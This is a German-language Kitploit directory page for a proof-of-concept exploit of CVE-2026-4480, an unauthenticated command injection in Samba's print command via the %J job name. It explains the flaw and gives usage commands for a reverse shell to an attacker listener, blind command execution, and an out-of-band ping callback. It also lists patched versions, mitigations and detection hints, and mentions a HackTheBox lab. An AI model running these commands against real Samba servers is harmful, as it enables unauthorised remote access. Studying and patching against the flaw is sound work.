Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-4480-PoC — Proof-of-Concept-Exploit für CVE-2026-4480, eine nicht authentifizierte Remote-Befehlseinschleusung in Sambas Drucksubsystem über den %J-Jobnamen-Parameter. Enthält Reverse-Shell- und Blind-Befehlausführungsmodi. | Kitploit
Tools/GitHubGitHub/thecybergeek/cve-2026-4480-poc
ExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

Proof-of-Concept-Exploit für CVE-2026-4480, eine nicht authentifizierte Remote-Befehlseinschleusung in Sambas Drucksubsystem über den %J-Jobnamen-Parameter. Enthält Reverse-Shell- und Blind-Befehlausführungsmodi.

Repository anzeigen
215vor 2 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-4480: Samba print-command (%J) Injection PoC

Wichtig — Lesen Sie dies zuerst:
Dieses Repository und exploit.py werden nur für Bildungs- und Forschungszwecke bereitgestellt. Verwenden Sie diesen Code nicht gegen Systeme, Netzwerke oder Dienste, für die Sie keine ausdrückliche schriftliche Genehmigung haben. Unautorisierter Zugriff auf Computersysteme ist illegal und unethisch. Durch die Nutzung dieses Codes stimmen Sie zu, die geltenden Gesetze und institutionellen Richtlinien einzuhalten.

Nicht authentifizierte entfernte Befehlsausführung im Samba-Drucksubsystem. Wenn ein Druckauftrag das Spooling beendet, führt Samba den konfigurierten print command über system() aus, wobei %s (Spool-Dateipfad) und %J (vom Client bereitgestellter Auftragsname) in den String eingesetzt werden. Vor dem Fix wurde der Auftragsname mit der einzigen Transformation ' → _ und nichts weiterem übergeben, sodass |, ;, &, Leerzeichen, <, > und Backticks alle die Shell erreichen. Ein print command, das %J referenziert, ist daher eine Shell-Injection-Senke, und da Gäste Druckaufträge einreichen können, ist das Problem pre-auth.

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • Behoben in: Samba 4.22.10, 4.23.8, 4.24.3
  • Betroffen: Druck-Backends, die einen externen print command ausführen, der %J referenziert (printing = sysv-Stil). printing = cups / iprint gehen über die CUPS-API und sind nicht betroffen.

Voraussetzungen

  • Linux mit den Samba Python-Bindungen:
    root@kitploit:~
    sudo apt install python3-samba
    
  • Netzwerkzugriff auf den SMB-Port des Ziels (445/139).
  • Eine für Gäste zugängliche Druckerfreigabe auf dem Ziel, deren print command %J referenziert.

Verwendung

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

Reverse-Shell

root@kitploit:~
# terminal 1: listener
nc -lvnp 4444

# terminal 2: fire the exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444

Sie sollten eine Shell als Druckdienstkonto (z.B. nobody) erhalten.

Einzelnen Befehl ausführen (blind)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

Da die Ausführung blind erfolgt (der Befehl wird serverseitig ausgeführt und liefert nichts auf dem RPC-Kanal zurück), bestätigen Sie ihn zuerst out-of-band, z.B. einen ICMP-Callback, den Sie mit tcpdump -ni tun0 icmp beobachten:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

Erkennung / Eindämmung

  • Patchen Sie auf 4.22.10 / 4.23.8 / 4.24.3 (oder höher).
  • Wenn Sie nicht patchen können, setzen Sie das Makro in Anführungszeichen: print command = /usr/local/bin/print-helper %s '%J', entfernen Sie %J, oder wechseln Sie zu printing = cups.
  • Suchen Sie nach von smbd gestarteten Shells (sh/bash/nc/python/curl) und dokumentieren Sie Namen, die Shell-Metazeichen enthalten.

Übung auf HackTheBox

Ich habe eine Box auf HackTheBox namens Abducted erstellt, um die Schwachstelle zu demonstrieren und Ihnen ein praktisches Beispiel zu geben, wie Angreifer dies in einer falsch konfigurierten Umgebung ausnutzen könnten.

Tool herunterladen
Argument / OptionBedeutung
rhostZiel-Samba-Host / IP
lhostIhre Listener-IP
lportIhr Listener-Port
-P, --printerName der Gäste-Druckerfreigabe (Standard: HP-Reception)
-c, --cmdFühre einen beliebigen Befehl statt einer Reverse-Shell aus